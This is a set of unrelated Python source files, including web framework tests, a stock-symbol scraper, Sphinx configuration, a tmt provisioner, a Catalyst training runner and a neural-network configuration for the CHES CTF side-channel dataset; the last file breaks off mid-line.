= original_image_path avatar_original['s3_path'] = original_image_path avatar_original_list.append(avatar_original) # Run downloads parallely output = [] for (status, job) in run_parallel(get_avatar, avatar_upload_list, threads=threads): output.append(job) logging.info('######### GETTING AVATARS FINISHED #########\n') return avatar_list + avatar_original_list def process_uploads(upload_list: List[ZerverFieldsT], upload_dir: str, threads: int) -> List[ZerverFieldsT]: """ This function downloads the uploads and saves it in the realm's upload directory. Required parameters: 1. upload_list: List of uploads to be mapped in uploads records.json file 2. upload_dir: Folder where the downloaded uploads are saved """ def get_uploads(upload: List[str]) -> int: upload_url = upload[0] upload_path = upload[1] upload_path = os.path.join(upload_dir, upload_path) response = requests.get(upload_url, stream=True) os.makedirs(os.path.dirname(upload_path), exist_ok=True) with open(upload_path, 'wb') as upload_file: shutil.copyfileobj(response.raw, upload_file) return 0 logging.info('######### GETTING ATTACHMENTS #########\n') logging.info('DOWNLOADING ATTACHMENTS .......\n') upload_url_list = [] for upload in upload_list: upload_url = upload['path'] upload_s3_path = upload['s3_path'] upload_url_list.append([upload_url, upload_s3_path]) upload['path'] = upload_s3_path # Run downloads parallely output = [] for (status, job) in run_parallel(get_uploads, upload_url_list, threads=threads): output.append(job) logging.info('######### GETTING ATTACHMENTS FINISHED #########\n') return upload_list def process_emojis(zerver_realmemoji: List[ZerverFieldsT], emoji_dir: str, emoji_url_map: ZerverFieldsT, threads: int) -> List[ZerverFieldsT]: """ This function downloads the custom emojis and saves in the output emoji folder. Required parameters: 1. zerver_realmemoji: List of all RealmEmoji objects to be imported 2. emoji_dir: Folder where the downloaded emojis are saved 3. emoji_url_map: Maps emoji name to its url """ def get_emojis(upload: List[str]) -> int: emoji_url = upload[0] emoji_path = upload[1] upload_emoji_path = os.path.join(emoji_dir, emoji_path) response = requests.get(emoji_url, stream=True) os.makedirs(os.path.dirname(upload_emoji_path), exist_ok=True) with open(upload_emoji_path, 'wb') as emoji_file: shutil.copyfileobj(response.raw, emoji_file) return 0 emoji_records = [] upload_emoji_list = [] logging.info('######### GETTING EMOJIS #########\n') logging.info('DOWNLOADING EMOJIS .......\n') for emoji in zerver_realmemoji: emoji_url = emoji_url_map[emoji['name']] emoji_path = RealmEmoji.PATH_ID_TEMPLATE.format( realm_id=emoji['realm'], emoji_file_name=emoji['name']) upload_emoji_list.append([emoji_url, emoji_path]) emoji_record = dict(emoji) emoji_record['path'] = emoji_path emoji_record['s3_path'] = emoji_path emoji_record['realm_id'] = emoji_record['realm'] emoji_record.pop('realm') emoji_records.append(emoji_record) # Run downloads parallely output = [] for (status, job) in run_parallel(get_emojis, upload_emoji_list, threads=threads): output.append(job) logging.info('######### GETTING EMOJIS FINISHED #########\n') return emoji_records
py
1a3f71dee3f107f5af11f61afab45c122d7599ad
from ferrisnose import AppEngineWebTest import wtforms import json from ferris.core.controller import Controller, route, route_with from ferris.core.json_util import DatastoreEncoder from google.appengine.ext import ndb # Decorators that make sure @route works correctly even for decorated functions def std_decorator(f): def std_wrapper(*args, **kwargs): return f(*args, **kwargs) return std_wrapper def wraps_decorator(f): from functools import wraps @wraps(f) def wraps_wrapper(*args, **kwargs): return f(*args, **kwargs) return wraps_wrapper class TestModel(ndb.Model): field1 = ndb.StringProperty() field2 = ndb.StringProperty() class TestForm(wtforms.Form): field1 = wtforms.TextField() field2 = wtforms.TextField() class TestComponent(object): def __init__(self, handler): self.handler = handler def present(self): return 'si' class TestController(Controller): class Meta: prefixes = ('monster',) components = (TestComponent,) def list(self): return 'list' def view(self, key): return 'view' def add(self): return 'add' def edit(self, key): return 'edit' def delete(self, key): return 204 def monster_list(self): return 'monster_list' @route @wraps_decorator def monkey(self, key): return 'monkey-%s' % key @route @std_decorator def monster_monkey(self, key): return 'monster_monkey-%s' % key @route_with('/test_controller/monet') def degas(self): return 'degas' @route def urls(self): assert self.uri(action='list') == '/test_controller' assert self.uri(prefix='monster', action='list') == '/monster/test_controller' assert self.uri(action='edit', key=12) == '/test_controller/%3A12/edit' assert self.uri('test_controller:list') == '/test_controller' assert self.uri('monster:test_controller:list') == '/monster/test_controller' assert self.uri('test_controller:monkey', key=13) == '/test_controller/monkey/13' return 'success' @route def component(self): return self.components.test_component.present() @route def numeric(self): return 401 @route def custom_content(self): self.response.content_type = 'application/json' return '[1, 2, 3]' @route def self_response(self): self.response.status_int = 401 self.response.body = 'lolidk' return self.response @route def do_redirect(self): return self.redirect(self.uri('test_controller:list')) @route def monster_template_names(self): return str(self.meta.view.get_template_names()) @route def form(self): form = TestForm() self.parse_request(container=form) return str(form.data) class ControllerTest(AppEngineWebTest): def setUp(self): super(ControllerTest, self).setUp() TestController._build_routes(self.testapp.app.router) def testCrudRoutes(self): response = self.testapp.get('/test_controller') self.assertEqual(response.body, 'list') response = self.testapp.get('/test_controller/add') self.assertEqual(response.body, 'add') response = self.testapp.get('/test_controller/:abcd') self.assertEqual(response.body, 'view') response = self.testapp.get('/test_controller/:abcd/edit') self.assertEqual(response.body, 'edit') response = self.testapp.get('/test_controller/:abcd/delete', status=204) def testRestRoutes(self): response = self.testapp.get('/test_controller') self.assertEqual(response.body, 'list') response = self.testapp.post('/test_controller') self.assertEqual(response.body, 'add') response = self.testapp.get('/test_controller/:abcd') self.assertEqual(response.body, 'view') response = self.testapp.put('/test_controller/:abcd') self.assertEqual(response.body, 'edit') response = self.testapp.delete('/test_controller/:abcd', status=204) def testPrefixRoutes(self): response = self.testapp.get('/monster/test_controller') self.assertEqual(response.body, 'monster_list') def testRouteDecorator(self): response = self.testapp.get('/test_controller/monkey/3') self.assertEqual(response.body, 'monkey-3') response = self.testapp.get('/monster/test_controller/monkey/3') self.assertEqual(response.body, 'monster_monkey-3') def testRouteWithDecorator(self): response = self.testapp.get('/test_controller/monet') self.assertEqual(response.body, 'degas') def testUrlGeneration(self): response = self.testapp.get('/test_controller/urls') self.assertEqual(response.body, 'success') def testComponents(self): response = self.testapp.get('/test_controller/component') self.assertEqual(response.body, 'si') def testReturnValues(self): response = self.testapp.get('/test_controller') assert 'text/html' in response.headers['Content-Type'] self.assertEqual(response.body, 'list') response = self.testapp.get('/test_controller/numeric', status=401) response = self.testapp.get('/test_controller/custom_content', status=200) assert 'application/json' in response.headers['Content-Type'] response = self.testapp.get('/test_controller/self_response', status=401) self.assertEqual(response.body, 'lolidk') response = self.testapp.get('/test_controller/do_redirect', status=302) self.assertEqual(response.headers['Location'], 'http://localhost/test_controller') def testTemplateNames(self): response = self.testapp.get('/monster/test_controller/template_names') self.assertEqual(response.body, str(['test_controller/monster_template_names.html', 'test_controller/template_names.html'])) def testFormDataProcessor(self): data = {'field2': u'f2', 'field1': u'f1'} response = self.testapp.post('/test_controller/form', data) self.assertEqual(response.body, str(data)) data['field3'] = u'f3' response = self.testapp.post('/test_controller/form', data) self.assertNotEqual(response.body, str(data), 'Field3 should not be in data') del data['field3'] data = json.dumps(data, cls=DatastoreEncoder) response = self.testapp.post('/test_controller/form', data, headers={'Content-Type': 'application/json'}) self.assertTrue('f1' in response) self.assertTrue('f2' in response)
py
1a3f7252754bcf10e1d747ff1edb266a809f91cd
from app import db class Usuario(db.Model): __tablename__ = 'usuarios' id = db.Column(db.Integer, primary_key=True) nome = db.Column(db.String(200)) email = db.Column(db.String(200), index=True, unique=True) senha = db.Column(db.String(200)) admin = db.Column(db.Boolean()) def __repr__(self): return '<Usuario %s>' % self.nome
py
1a3f727725aff897105563f3ce3e50406f30f334
''' Created on Jul 25, 2017 @author: Daniel Sela, Arnon Sela ''' def sixty(scalar, trailsign=False, ): ''' ;+ ; NAME: ; SIXTY() ; PURPOSE: ; Converts a decimal number to sexagesimal. ; EXPLANATION: ; Reverse of the TEN() function. ; ; CALLING SEQUENCE: ; X = SIXTY( SCALAR, [ /TrailSign ] ) ; ; INPUTS: ; SCALAR -- Decimal quantity. ; OUTPUTS: ; Function value returned = real vector of three elements, ; sexagesimal equivalent of input decimal quantity. Double ; precision if the input is double, otherwise floating point. ; By default, a negative number is signified by making the first non-zero ; element of the output vection negative, but this can be modified with ; the /TrailSign keyword. ; ; OPTIONAL INPUT KEYWORD: ; /TrailSign - By default, SIXTY() returns a negative sign in the first ; nonzero element. If /TrailSign is set, then SIXTY() will return ; always return a negative sign in the first element, even if it is ; zero ; PROCEDURE: ; Mostly involves checking arguments and setting the sign. ; ; EXAMPLE: ; If x = -0.345d then sixty(x) = [0.0, -20.0, 42.0] ; and sixty(x,True) = [-0.0, 20.0, 42.0] ;- Changes History: Added dd range limit - force positive value by complementing to dd_range prevent adding negative sign to value of 0 ''' if not isinstance(scalar, float): scalar = float(scalar) ss = abs(3600.0*scalar) mm = abs(60.0*scalar) dd = abs(scalar) result = [0, 0, 0] result[0] = int(dd) result[1] = int(mm-60.0*result[0]) result[2] = ss-3600.0*result[0] - 60.0*result[1] if scalar < 0: if trailsign: result[0] = -result[0] else: if result[0] != 0: result[0] = -result[0] elif result[1] != 0: result[1] = -result[1] elif result[2] != 0: result[2] = -result[2] return result if __name__ == '__main__': import unittest from astropy.coordinates import Angle from astropy import units as u class TestSixtyMethod(unittest.TestCase): def test_1(self): self.assertEqual(sixty(-0.5), [0, -30, 0.0]) def test_2(self): self.assertEqual(sixty(0.5), [0, 30, 0.0]) def test_3(self): self.assertEqual(sixty(10.49999), [10, 29, 59.96399999999994]) def test_4(self): dms = Angle(-0.5, unit=u.deg).dms result = list(dms._asdict().values()) self.assertEqual(result, [-0.0, -30.0, -0.0]) unittest.main()
py
1a3f72ffac96d80d595a41209fe77b7fa0b1773f
#!/usr/bin/env python3 # -*- coding: utf-8 -*- """ Created on Thu Feb 18 22:18:27 2021 @author: galin """ import string import requests from bs4 import BeautifulSoup import pandas as pd import time from tqdm.auto import tqdm # stock exchange : # AMEX - American Stock Exchange, # LSE - London Stock Exchange, # NASDAQ - NASDAQ Stock Exchange, # NYSE - New York Stock Exchange, # SGX - Singapore Stock Exchange # TSX - Toronto Stock Exchange def get_indexes (stocks_exchange): def get_stock_indexes(stock_exchange_name): base_url="http://eoddata.com/stocklist" letters_upper_case = list(string.ascii_uppercase) digits = [x for x in range(10)] if stock_exchange_name in ['LSE', 'SGX']: symbols_tabs = digits + letters_upper_case else: symbols_tabs = letters_upper_case df_index_description = pd.DataFrame({'Code':[], 'Name':[]}) urls = [base_url + "/{}/{}.htm".format(stock_exchange_name, letter) for letter in symbols_tabs ] html_contents = (requests.get(url).text for url in urls) with tqdm(total=len(urls)) as pbar: for html_content in html_contents: soup = BeautifulSoup(html_content, "lxml") tables = soup.find_all(lambda tag: tag.name=='table') read_table = pd.read_html(str(tables[5])) temp = read_table[0][['Code','Name']] if(set(temp['Code']).isdisjoint(set(df_index_description['Code']))): df_index_description = pd.concat([df_index_description , read_table[0][['Code','Name']] ]) time.sleep(1) pbar.update(1) return df_index_description['Code'] df_index_description = pd.DataFrame() for stocks in stocks_exchange: df_index_description = pd.concat([df_index_description , get_stock_indexes(stocks)]) return df_index_description[0].tolist()
py
1a3f736624d7ebca97f6573d68fed32100008f64
import pyaf.tests.model_control.test_ozone_custom_models_enabled as testmod testmod.build_model( ['Fisher'] , ['MovingAverage'] , ['Seasonal_DayOfWeek'] , ['SVR'] );
py
1a3f73ccde0dc1ea07cca2d9729597904b2f5b41
# -*- coding: utf-8 -*- # # bebop_autonomy documentation build configuration file, created by # sphinx-quickstart on Mon Sep 7 15:33:01 2015. # # This file is execfile()d with the current directory set to its # containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. import sys import os # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. #sys.path.insert(0, os.path.abspath('.')) # -- General configuration ------------------------------------------------ # If your documentation needs a minimal Sphinx version, state it here. #needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. extensions = [] # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix of source filenames. source_suffix = '.rst' # The encoding of source files. #source_encoding = 'utf-8-sig' # The master toctree document. master_doc = 'index' # General information about the project. project = u'bebop_autonomy' copyright = u'2015, Mani Monajjemi (AutonomyLab, Simon Fraser University)' # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The short X.Y version. version = 'indigo-devel' # The full version, including alpha/beta/rc tags. release = 'indigo-devel' # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. #language = None # There are two options for replacing |today|: either, you set today to some # non-false value, then it is used: #today = '' # Else, today_fmt is used as the format for a strftime call. #today_fmt = '%B %d, %Y' # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. exclude_patterns = ['_build'] # The reST default role (used for this markup: `text`) to use for all # documents. #default_role = None # If true, '()' will be appended to :func: etc. cross-reference text. #add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::). #add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. #show_authors = False # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # A list of ignored prefixes for module index sorting. #modindex_common_prefix = [] # If true, keep warnings as "system message" paragraphs in the built documents. #keep_warnings = False # -- Options for HTML output ---------------------------------------------- # The theme to use for HTML and HTML Help pages. See the documentation for # a list of builtin themes. html_theme = 'default' # Theme options are theme-specific and customize the look and feel of a theme # further. For a list of options available for each theme, see the # documentation. #html_theme_options = {} # Add any paths that contain custom themes here, relative to this directory. #html_theme_path = [] # The name for this set of Sphinx documents. If None, it defaults to # "<project> v<release> documentation". #html_title = None # A shorter title for the navigation bar. Default is the same as html_title. #html_short_title = None # The name of an image file (relative to this directory) to place at the top # of the sidebar. #html_logo = None # The name of an image file (within the static path) to use as favicon of the # docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 # pixels large. #html_favicon = None # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". #html_static_path = ['_static'] # Add any extra paths that contain custom files (such as robots.txt or # .htaccess) here, relative to this directory. These files are copied # directly to the root of the documentation. #html_extra_path = [] # If not '', a 'Last updated on:' timestamp is inserted at every page bottom, # using the given strftime format. #html_last_updated_fmt = '%b %d, %Y' # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. #html_use_smartypants = True # Custom sidebar templates, maps document names to template names. #html_sidebars = {} # Additional templates that should be rendered to pages, maps page names to # template names. #html_additional_pages = {} # If false, no module index is generated. #html_domain_indices = True # If false, no index is generated. #html_use_index = True # If true, the index is split into individual pages for each letter. #html_split_index = False # If true, links to the reST sources are added to the pages. #html_show_sourcelink = True # If true, "Created using Sphinx" is shown in the HTML footer. Default is True. #html_show_sphinx = True # If true, "(C) Copyright ..." is shown in the HTML footer. Default is True. #html_show_copyright = True # If true, an OpenSearch description file will be output, and all pages will # contain a <link> tag referring to it. The value of this option must be the # base URL from which the finished HTML is served. #html_use_opensearch = '' # This is the file name suffix for HTML files (e.g. ".xhtml"). #html_file_suffix = None # Output file base name for HTML help builder. htmlhelp_basename = 'bebop_autonomydoc' # -- Options for LaTeX output --------------------------------------------- latex_elements = { # The paper size ('letterpaper' or 'a4paper'). #'papersize': 'letterpaper', # The font size ('10pt', '11pt' or '12pt'). #'pointsize': '10pt', # Additional stuff for the LaTeX preamble. #'preamble': '', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, # author, documentclass [howto, manual, or own class]). latex_documents = [ ('index', 'bebop_autonomy.tex', u'bebop\\_autonomy Documentation', u'Mani Monajjemi', 'manual'), ] # The name of an image file (relative to this directory) to place at the top of # the title page. #latex_logo = None # For "manual" documents, if this is true, then toplevel headings are parts, # not chapters. #latex_use_parts = False # If true, show page references after internal links. #latex_show_pagerefs = False # If true, show URL addresses after external links. #latex_show_urls = False # Documents to append as an appendix to all manuals. #latex_appendices = [] # If false, no module index is generated. #latex_domain_indices = True # -- Options for manual page output --------------------------------------- # One entry per manual page. List of tuples # (source start file, name, description, authors, manual section). man_pages = [ ('index', 'bebop_autonomy', u'bebop_autonomy Documentation', [u'Mani Monajjemi'], 1) ] # If true, show URL addresses after external links. #man_show_urls = False # -- Options for Texinfo output ------------------------------------------- # Grouping the document tree into Texinfo files. List of tuples # (source start file, target name, title, author, # dir menu entry, description, category) texinfo_documents = [ ('index', 'bebop_autonomy', u'bebop_autonomy Documentation', u'Mani Monajjemi', 'bebop_autonomy', 'One line description of project.', 'Miscellaneous'), ] # Documents to append as an appendix to all manuals. #texinfo_appendices = [] # If false, no module index is generated. #texinfo_domain_indices = True # How to display URL addresses: 'footnote', 'no', or 'inline'. #texinfo_show_urls = 'footnote' # If true, do not generate a @detailmenu in the "Top" node's menu. #texinfo_no_detailmenu = False on_rtd = os.environ.get('READTHEDOCS', None) == 'True' if not on_rtd: # only import and set the theme if we're building docs locally import sphinx_rtd_theme html_theme = 'sphinx_rtd_theme' html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
py
1a3f73d1173dc771e60d7801ed221a19b8167443
import pytest from pymtl import * from tests.context import lizard from lizard.model.test_model import run_test_state_machine from lizard.util.rtl.lookup_registerfile import LookupRegisterFile, LookupRegisterFileInterface from lizard.util.fl.lookup_registerfile import LookupRegisterFileFL def test_state_machine(): run_test_state_machine( LookupRegisterFile, LookupRegisterFileFL, (LookupRegisterFileInterface( Bits(8), Bits(8), 2, 2), [(2, 4), 3], [0, 0]), translate_model=True)
py
1a3f742397de3882a0c15860a35058cff24d52f7
import six from rest_framework import status def sanitized(schema_key): if type(schema_key) is tuple: return schema_key[0] return schema_key def key_params(schema_key): if type(schema_key) is tuple: return schema_key[1:] return [] def get_required(schema_keys): for key in schema_keys: params = key_params(key) if 'norequired' in params: continue yield sanitized(key) def get_object_properties(schema): return { sanitized(skey): val for skey, val in schema.items() } def parse_schema(schema): if type(schema) is six.binary_type or type(schema) is six.text_type: return { 'type': schema, } elif type(schema) is list: return { 'type': 'list', } elif type(schema) is dict: title = schema.get(':title', None) required_elts = list(get_required(schema.keys())) properties = get_object_properties(schema) return { 'type': 'object', 'title': title, 'properties': { prop_name: parse_schema(subschema) for prop_name, subschema in properties.items() }, 'required': required_elts, } else: raise Exception('Unsupported schema definition') def responds(status=status.HTTP_200_OK, meaning='Undocumented status code', schema=None, schema_name=None, **kwargs): """Documents the status code per handled case. Additional parameters may make it into the OpenAPI documentation per view. Examples of those parameters include examples={'application/json': <example>}. As schemata are needed in order to render the examples in the Web UI, an error will be signaled if examples= are provided without a schema= parameter. Schemas can be easily built using a specific syntax. TODO: Document the syntax here """ # TODO: Document syntax in above docstring if status is None: status = 'default' obj = {} obj['description'] = meaning if schema: obj['schema'] = parse_schema(schema) if schema_name: obj['schema_name'] = schema_name obj.update(kwargs) def decorator(func): # We do not return a decorator function, we just modify # in-place our function to have the property that we will look # forward later for. if not hasattr(func, '_responses'): func._responses = {} func._responses[status] = obj return func return decorator
py
1a3f74816979c8eef428462a6458bc569049529e
import os from click import echo from tmt.steps.provision.base import ProvisionBase from tmt.utils import SpecificationError class ProvisionLocalhost(ProvisionBase): """ Localhost provisioner """ def __init__(self, data, step): super(ProvisionLocalhost, self).__init__(data, step) self._prepare_map = { 'ansible': self._prepare_ansible, 'shell': self._prepare_shell, } def execute(self, *args, **kwargs): self.run(self.join(args)) def _prepare_ansible(self, what): """ Run ansible on localhost """ # Playbook paths should be relative to the metadata tree root playbook = os.path.join(self.step.plan.run.tree.root, what) # Prepare verbose level based on the --debug option count verbose = ' -' + self.opt('debug') * 'v' if self.opt('debug') else '' # Run ansible playbook against localhost, in verbose mode ansible = ( f'ansible-playbook{verbose} -c local -i localhost, {playbook}') # Force column width to 80 chars, to mitigate issues with too long # lines due to indent. Column width is the same as with libvirt plugin. columns = 'stty cols 80' self.run(f'sudo sh -c "{columns}; {ansible}"') def _prepare_shell(self, what): """ Run ansible on localhost """ # Set current working directory to the test metadata root self.run(what, cwd=self.step.plan.run.tree.root) def prepare(self, how, what): """ Run prepare phase """ try: self._prepare_map[how](what) except AttributeError as e: raise SpecificationError( f"Prepare method '{how}' is not supported.")
py
1a3f74fb29fbd48afdf202d2457761bfaaece431
from typing import ( # isort:skip Any, Callable, Dict, Mapping, Optional, Tuple, Union # isort:skip ) # isort:skip from abc import ABC, abstractmethod from collections import OrderedDict import torch from torch import nn from torch.utils.data import DataLoader, DistributedSampler from catalyst import utils from catalyst.utils.tools.typing import ( Criterion, Device, Model, Optimizer, Scheduler ) from .callback import Callback, LoggerCallback from .experiment import _Experiment from .state import _State class _Runner(ABC): """ Abstract class for all runners inherited from """ experiment_fn: Callable = _Experiment state_fn: callable = _State def __init__( self, model: Model = None, device: Device = None, ): """ Args: model (Model): Torch model object device (Device): Torch device """ # main self._model: Model = model self._device: Device = device self.experiment: _Experiment = None self.state: _State = None self.callbacks: OrderedDict[str, Callback] = None self.loggers: OrderedDict[str, LoggerCallback] = None self.loaders: OrderedDict[str, DataLoader] = None # additional self._check_run = False @property def model(self) -> Model: """ Returns the runner's model instance """ return self._model @model.setter def model(self, value: Union[Model, Dict[str, Model]]): """ Setter for the runner's model' """ if isinstance(value, nn.Module): model = value elif isinstance(value, dict): values_are_models = all( [isinstance(v, nn.Module) for v in value.values()] ) if not values_are_models: raise TypeError( "Invalid dict value type, must be `torch.nn.Module`" ) model = value else: raise TypeError( f"Invalid value type " f"must be `torch.nn.Module` or `Dict[str, torch.nn.Module]` " f"got '{type(value)}'" ) if self._device is not None: model: Model = utils.maybe_recursive_call( model, "to", device=self._device ) self._model = model @property def device(self) -> Device: """ Returns the runner's device instance """ return self._device @device.setter def device(self, value: Device): """ Setter for the runner's device' """ if isinstance(value, (str, torch.device)): self._device = value else: raise TypeError( f"Invalid value type " f"must be `str` or `torch.device` " f"got '{type(value)}'" ) if self._model is not None: self._model = utils.maybe_recursive_call( self._model, "to", device=self._device ) @abstractmethod def forward(self, batch: Mapping[str, Any], **kwargs) -> Mapping[str, Any]: """ Forward method for your Runner Args: batch: Key-value batch items **kwargs: kwargs to pass to the model """ pass def _get_experiment_components( self, stage: str = None ) -> Tuple[Model, Criterion, Optimizer, Scheduler, Device]: """ Inner method for children's classes for model specific initialization. As baseline, checks device support and puts model on it. :return: """ utils.set_global_seed(self.experiment.initial_seed) model = self.experiment.get_model(stage) criterion, optimizer, scheduler = \ self.experiment.get_experiment_components(model, stage) model, criterion, optimizer, scheduler, device = \ utils.process_components( model=model, criterion=criterion, optimizer=optimizer, scheduler=scheduler, distributed_params=self.experiment.distributed_params, device=self.device ) return model, criterion, optimizer, scheduler, device def _prepare_for_stage(self, stage: str): utils.set_global_seed(self.experiment.initial_seed) migrating_params = {} if self.state is not None: migrating_params.update( { "step": self.state.step, "epoch": self.state.epoch } ) utils.set_global_seed(self.experiment.initial_seed) self.model, criterion, optimizer, scheduler, self.device = \ self._get_experiment_components(stage) utils.set_global_seed(self.experiment.initial_seed) self.state = self.state_fn( stage=stage, model=self.model, device=self.device, criterion=criterion, optimizer=optimizer, scheduler=scheduler, **self.experiment.get_state_params(stage), **migrating_params ) utils.set_global_seed(self.experiment.initial_seed) callbacks = self.experiment.get_callbacks(stage) loggers = utils.process_callbacks( OrderedDict( [ (k, v) for k, v in callbacks.items() if isinstance(v, LoggerCallback) ] ) ) callbacks = utils.process_callbacks( OrderedDict( [ (k, v) for k, v in callbacks.items() if not isinstance(v, LoggerCallback) ] ) ) self.state.loggers = loggers self.loggers = loggers self.callbacks = callbacks def _prepare_for_epoch(self, stage: str, epoch: int): pass # @TODO: too complicated -> rewrite def _run_event(self, event: str, moment: Optional[str]): fn_name = f"on_{event}" if moment is not None: fn_name = f"{fn_name}_{moment}" # before callbacks if self.state is not None: getattr(self.state, f"{fn_name}_pre")() if self.loggers is not None and moment == "start": for logger in self.loggers.values(): getattr(logger, fn_name)(self.state) # running callbacks if self.callbacks is not None: for callback in self.callbacks.values(): getattr(callback, fn_name)(self.state) # after callbacks if self.loggers is not None and \ (moment == "end" or moment is None): # for on_exception case for logger in self.loggers.values(): getattr(logger, fn_name)(self.state) if self.state is not None: getattr(self.state, f"{fn_name}_post")() def _batch2device(self, batch: Mapping[str, Any], device: Device): output = utils.any2device(batch, device) return output def _run_batch_train_step(self, batch: Mapping[str, Any]): self.state.output = self.forward(batch) @torch.no_grad() def predict_batch( self, batch: Mapping[str, Any], **kwargs ) -> Mapping[str, Any]: """ Run model for a batch of elements WARN: You should not override this method. If you need specific model call, override forward() method Args: batch: Key-value batch items **kwargs: kwargs to pass to the model Returns: model output key-value """ batch = self._batch2device(batch, self.device) output = self.forward(batch, **kwargs) return output def _run_batch(self, batch: Mapping[str, Any]): self.state.step += self.state.batch_size batch = self._batch2device(batch, self.device) self.state.input = batch self.state.timer.stop("_timers/data_time") self._run_event("batch", moment="start") self.state.timer.start("_timers/model_time") self._run_batch_train_step(batch=batch) self.state.timer.stop("_timers/model_time") self.state.timer.stop("_timers/batch_time") self._run_event("batch", moment="end") def _run_loader(self, loader: DataLoader): self.state.batch_size = ( loader.batch_sampler.batch_size if loader.batch_sampler is not None else loader.batch_size ) self.state.step = ( self.state.step or self.state.epoch * len(loader) * self.state.batch_size ) # @TODO: remove time usage, use it under the hood self.state.timer.reset() self.state.timer.start("_timers/batch_time") self.state.timer.start("_timers/data_time") for i, batch in enumerate(loader): self._run_batch(batch) self.state.timer.reset() if self._check_run and i >= 2: break self.state.timer.start("_timers/batch_time") self.state.timer.start("_timers/data_time") def _run_epoch(self, stage: str, epoch: int): self._prepare_for_epoch(stage=stage, epoch=epoch) assert self.loaders is not None loaders = self.loaders # @TODO: better solution with train/inference handling ? if not self.state.stage.startswith("infer"): assert self.state.valid_loader in loaders.keys(), \ f"'{self.state.valid_loader}' " \ f"should be in provided loaders: {list(loaders.keys())}" else: assert not any(x.startswith("train") for x in loaders.keys()), \ "for inference no train loader should be passed" for loader_name, loader in loaders.items(): self.state.loader_name = loader_name self.state.loader_len = len(loader) self.state.need_backward = loader_name.startswith("train") self.model.train(self.state.need_backward) if isinstance(loader.sampler, DistributedSampler) \ and loader_name.startswith("train"): loader.sampler.set_epoch(self.state.stage_epoch) utils.set_global_seed( self.experiment.initial_seed + self.state.epoch + 1 ) self._run_event("loader", moment="start") with torch.set_grad_enabled(self.state.need_backward): self._run_loader(loader) self._run_event("loader", moment="end") def _run_stage(self, stage: str): self._prepare_for_stage(stage) self._run_event("stage", moment="start") for epoch in range(self.state.num_epochs): self.state.stage_epoch = epoch self._run_event("epoch", moment="start") self._run_epoch(stage=stage, epoch=epoch) self._run_event("epoch", moment="end") if self._check_run and self.state.stage_epoch >= 2: break if self.state.early_stop: self.state.early_stop = False break self.state.epoch += 1 self._run_event("stage", moment="end") def run_experiment(self, experiment: _Experiment, check: bool = False): """ Starts the experiment """ self._check_run = check self.experiment = experiment # jupyter source code logging hack # + hack to prevent cycle imports # @TODO: remove hack to catalyst.dl only, not core # from catalyst.dl.experiment import BaseExperiment # if isinstance(self.experiment, BaseExperiment) \ # and self.experiment.logdir is not None: # expdir = Path(os.getcwd()) # logdir = Path(self.experiment.logdir) # utils.dump_base_experiment_code(expdir, logdir) try: for stage in self.experiment.stages: self._run_stage(stage) except (Exception, KeyboardInterrupt) as ex: # if an exception had been raised # before the exception-handlers were initialized if self.loggers is None or self.callbacks is None: raise ex else: self.state.exception = ex self._run_event("exception", moment=None) return self __all__ = ["_Runner"]
py
1a3f75621fa9836999669f720440d0b804ee193a
from sklearn import preprocessing from . import state_space_parameters as ssp import countermeasures.data_loader as data_loader import numpy as np import tensorflow as tf MODEL_NAME = 'CHES_CTF_HW' # Number of output neurons NUM_CLASSES = 9 # Number of output neurons # Input Size INPUT_SIZE = 2200 # Batch Queue parameters TRAIN_BATCH_SIZE = 400 # Batch size for training (scaled linearly with number of gpus used) NUM_EXAMPLES_PER_EPOCH_FOR_TRAIN = 45000 # Number of training examples VALIDATION_FROM_ATTACK_SET = True EVAL_BATCH_SIZE = TRAIN_BATCH_SIZE # Batch size for validation NUM_EXAMPLES_PER_EPOCH_FOR_EVAL = 2500 # Number of validation examples MAX_EPOCHS = 50 # Max number of epochs to train model # Training Parameters OPTIMIZER = 'Adam' # Optimizer (should be in caffe format string) MAX_LR = 5e-3 # The max LR (scaled linearly with number of gpus used) # Bulk data folder BULK_ROOT = '/tudelft.net/staff-bulk/ewi/insy/CYS/spicek/jrijsdijk/rl-paper/CHES_CTF/cm_experiment_hw/' DATA_ROOT = BULK_ROOT + '../data/' # Trained model dir TRAINED_MODEL_DIR = BULK_ROOT + 'trained_models' DB_FILE = DATA_ROOT + 'ches_ctf.h5' (TRAIN_TRACES, TRAIN_DATA), (ATTACK_TRACES, ATTACK_DATA) = data_loader.load_ches_hd5( DB_FILE, '/Profiling_traces/traces', '/Profiling_traces/metadata', '/Attack_traces/traces', '/Attack_traces/metadata' ) TRAIN_LABELS = np.array([bin(x).count("1") for x in np.load(DATA_ROOT + 'train_labels.npy')]) ATTACK_LABELS = np.array([bin(x).count("1") for x in np.load(DATA_ROOT + 'attack_labels.npy')]) NOISE_SCALE = data_loader.get_noise_scale(TRAIN_TRACES) USE_OCLR = True MODEL_PREPROCESSING = [ preprocessing.StandardScaler() ] MODEL_LAYERS = [ tf.keras.layers.Conv1D(4, 100, kernel_initializer='he_uniform', activation='selu', padding='same'), tf.keras.layers.AveragePooling1D(4, strides=4), tf.keras.layers.Flatten(name='flatten'), tf.keras.layers.Dense(15, kernel_initializer='he_uniform', activation='selu'), tf.keras.layers.Dense(10, kernel_initializer='he_uniform', activation='selu'), tf.keras.layers.Dense(10, kernel_initializer='he_uniform', activation='selu'), tf.keras.layers.Dense(NUM_CLASSES, activation='softmax') ] KEY = 